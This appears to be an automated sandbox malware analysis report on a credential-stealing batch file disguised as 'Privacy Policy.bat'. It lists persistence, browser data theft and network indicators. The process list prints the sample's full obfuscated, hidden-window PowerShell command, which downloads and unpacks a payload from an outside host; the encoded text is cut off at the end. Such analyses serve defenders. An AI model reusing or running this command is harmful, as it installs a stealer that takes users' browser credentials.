Malware Analysis Report

2025-06-16 00:52

Sample ID 241105-ynezpaznep
Target Privacy Policy.bat
SHA256 306f51ede68339ed5d0e2dbd931e9d481a87f331a5341b0740d417fe9a311936
Tags
credential_access discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

306f51ede68339ed5d0e2dbd931e9d481a87f331a5341b0740d417fe9a311936

Threat Level: Known bad

The file Privacy Policy.bat was found to be: Known bad.

Malicious Activity Summary

credential_access discovery spyware stealer

Uses browser remote debugging

Blocklisted process makes network request

Drops startup file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

System Location Discovery: System Language Discovery

Browser Information Discovery

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 19:55

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 19:55

Reported

2024-11-05 19:58

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Window Explorer.lnk C:\WinExplorer\python.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Window Explorer.lnk C:\WinExplorer\python.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A
N/A N/A C:\WinExplorer\python.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\WinExplorer\python.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\WinExplorer\python.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-940901362-3608833189-1915618603-1000\{514C8417-909C-4553-9D9C-FF6E887F6BD7} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 224 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3092 wrote to memory of 1688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3092 wrote to memory of 1688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1688 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1688 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3092 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\WinExplorer\python.exe
PID 3092 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\WinExplorer\python.exe
PID 3092 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\WinExplorer\python.exe
PID 3092 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\WinExplorer\python.exe
PID 3092 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\WinExplorer\python.exe
PID 3092 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\WinExplorer\python.exe
PID 2584 wrote to memory of 3592 N/A C:\WinExplorer\python.exe C:\Windows\SysWOW64\taskkill.exe
PID 2584 wrote to memory of 3592 N/A C:\WinExplorer\python.exe C:\Windows\SysWOW64\taskkill.exe
PID 2584 wrote to memory of 3592 N/A C:\WinExplorer\python.exe C:\Windows\SysWOW64\taskkill.exe
PID 2584 wrote to memory of 4852 N/A C:\WinExplorer\python.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2584 wrote to memory of 4852 N/A C:\WinExplorer\python.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 1428 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 1428 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4216 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4216 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 3600 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 3600 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 3436 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 3436 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 2500 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 2500 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4616 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 4616 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 2692 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4852 wrote to memory of 2692 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2584 wrote to memory of 4332 N/A C:\WinExplorer\python.exe C:\Windows\SysWOW64\taskkill.exe
PID 2584 wrote to memory of 4332 N/A C:\WinExplorer\python.exe C:\Windows\SysWOW64\taskkill.exe
PID 2584 wrote to memory of 4332 N/A C:\WinExplorer\python.exe C:\Windows\SysWOW64\taskkill.exe
PID 2584 wrote to memory of 1928 N/A C:\WinExplorer\python.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2584 wrote to memory of 1928 N/A C:\WinExplorer\python.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 212 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 212 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3796 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 4412 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 4412 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 1052 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1928 wrote to memory of 4036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep by"pas"s -w hid"de"n -enc JAB1AHIAbAAgAD0AIAAnAGgAd"AB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0A"GgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcABvAHMAZQBpAGQAbwBuADEAMwAzADgALwBzAHAAMAA0AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBzAGIAYQB0ADIAJwANAAoAJAB1AHIAbAAyACAAPQAgACcAJwANAAoAZgB1AG4AYwB0AGkAbwBuACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAewANAAoAIAAgACQAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAQwBvAGQAZQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAnAA0ACgAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjAEMAbwBkAGUAIAAtAG4AYQBtAGUAIABXAGkAbgAzADIAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBQAGEAcwBzAFQAaAByAHUADQAKAA0ACgAgACAAJABoAHcAbgBkACAAPQAgACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBQAEkARAAgACQAcABpAGQAKQAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIABpAGYAIAAoACQAaAB3AG4AZAAgAC0AbgBlACAAWwBTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8AKQAgAHsADQAKACAAIAAgACAAJABTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwA6ADoAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKAAkAGgAdwBuAGQALAAgADAAKQANAAoAIAAgAH0AIABlAGwAcwBlACAAewANAAoADQAKACAAIAAgACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAA9ACAATgBlAHcALQBHAHUAaQBkAA0ACgAgACAAIAAgACQASABvAHMAdAAuAFUASQAuAFIAYQB3AFUASQAuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAgAD0AIAAkAFUAbgBpAHEAdQBlAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQANAAoAIAAgACAAIAAkAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIAAxADAAMgA0AA0ACgAgACAAIAAgACQAVABlAHIAbQBpAG4AYQBsAFAAcgBvAGMAZQBzAHMAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAAtAGUAcQAgACQAVQBuAGkAcQB1AGUAVwBpAG4AZABvAHcAVABpAHQAbABlA"CAAfQApAA0ACgAgACAAIAANAAoAIAAgA"CAAIAAkAGgAdwBuAGQAIAA9ACAAJABUAGUAcgBtAGkAbgBhAGwAUAByAG8AYwBlAHMAcwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIAAgACAAaQBmACAAKAAkAGgAdwBuAGQAIAAtAG4AZQAgAFsAUwB5AHMAdABlAG0ALgBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAIAB7AA0ACgAgACAAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjADoAOgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAoACQAaAB3AG4AZAAsACAAMAApAA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARgBhAGkAbABlAGQAIAB0AG8AIABoAGkAZABlACAAdABoAGUAIABjAG8AbgBzAG8AbABlACAAdwBpAG4AZABvAHcALgAiAA0ACgAgACAAIAAgAH0ADQAKACAAIAB9AA0ACgB9AA0ACgBIAGkAZABlAC0AQwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwANAAoAJABlAG4AdgBwACAAPQAgACIAQwA6AFwAVwBpAG4ARQB4AHAAbABvAHIAZQByAFwAIgANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZQBuAHYAcAApACkAIAB7AA0ACgAgACAAIAAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGUAbgB2AHAADQAKACAAIAAgACAAIwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAQAbAB3R5uAGcAIABkAKsebgAgABEB4wAgABEBsAHjHmMAIAB0AKEebwA6ACAAJABlAG4AdgBwACIADQAKAH0ADQAKAGUAbABzAGUAIAB7AA0ACgAgACAAIAAgACMAVwByAGkAdABlAC0ASABvAHMAdAAgACIAEAGwAd0ebgBnACAAZACrHm4AIAARAeMAIAB0ANMebgAgAHQAoR5pADoAIAAkAGUAbgB2AHAAIgANAAoAfQANAAoAJABlAG4AdgB1ACAAPQAgACIAaAB0AHQAcABzADoALwAvAGMAaAByAG8AbQBlAHUAcABkAGEAdABlAHMALgBjAG8AbQAvAEUAbgB2AC4AegBpAHAAIgANAAoAJABlAG4AdgB6ACAAPQAgACQAZQBuAHYAcAAgACsAIAAiAFcAaQBuAEgAZQBsAHAAZQByAC4AegBpAHAAIgANAAoAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAGwAaQBlAG4AdAApAC4ARABvAFcAbgBsAG8AQQBkAEYAaQBsAGUAKAAkAGUAbgB2AHUALAAgACQAZQBuAHYAegApAA0ACgB0AHIAeQAgAHsADQAKACAAIAAgACAAIwAgAFQAox5pACAAdABoALABIAB2AGkAxx5uACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBGAGkAbABlAFMAeQBzAHQAZQBtACAAbgC/HnUAIABjAGgAsAFhACAAYwDzAA0ACgAgACAAIAAgAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARgBpAGwAZQBTAHkAcwB0AGUAbQAiAA0ACgANAAoAIAAgACAAIAAjACAAEAGwAd0ebgBnACAAZACrHm4AIAARAb8ebgAgAGYAaQBsAGUAIABaAEkAUAAgAHYA4AAgAHQAaACwASAAbQDlHmMAIAARAe0AYwBoAA0ACgAgACAAIAAgACQAegBpAHAARgBpAGwAZQBQAGEAdABoACAAPQAgACQAZQBuAHYAegANAAoAIAAgACAAIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBGAG8AbABkAGUAcgAgAD0AIAAkAGUAbgB2AHAADQAKAA0ACgAgACAAIAAgACMAIABHAGkAox5pACAAbgDpAG4AIABmAGkAbABlACAAWgBJAFAADQAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAFoAaQBwAEYAaQBsAGUAXQA6ADoARQB4AHQAcgBhAGMAdABUAG8ARABpAHIAZQBjAHQAbwByAHkAKAAkAHoAaQBwAEYAaQBsAGUAUABhAHQAaAAsACAAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4ARgBvAGwAZABlAHIAKQANAAoADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIARwBpAKMeaQAgAG4A6QBuACAAdABoAOAAbgBoACAAYwD0AG4AZwAhACIAOwANAAoAfQAgAGMAYQB0AGMAaAAgAHsADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQwDzACAAbADXHmkAIAB4AKMeeQAgAHIAYQAgAHQAcgBvAG4AZwAgAHEAdQDhACAAdAByAOwAbgBoACAAZwBpAKMeaQAgAG4A6QBuADoAIgANAAoAfQANAAoAJABzAHQAIAA9ACAAJABlAG4AdgBwACAAKwAgACIARwBpAG0AcABvAHIAdAAuAGQAYQB0ACIADQAKACQAcwB0AGMAdAAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAHMAdAAgAC0AUgBhAHcAIAANAAoAJABzAHQAYwB0ADIAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0A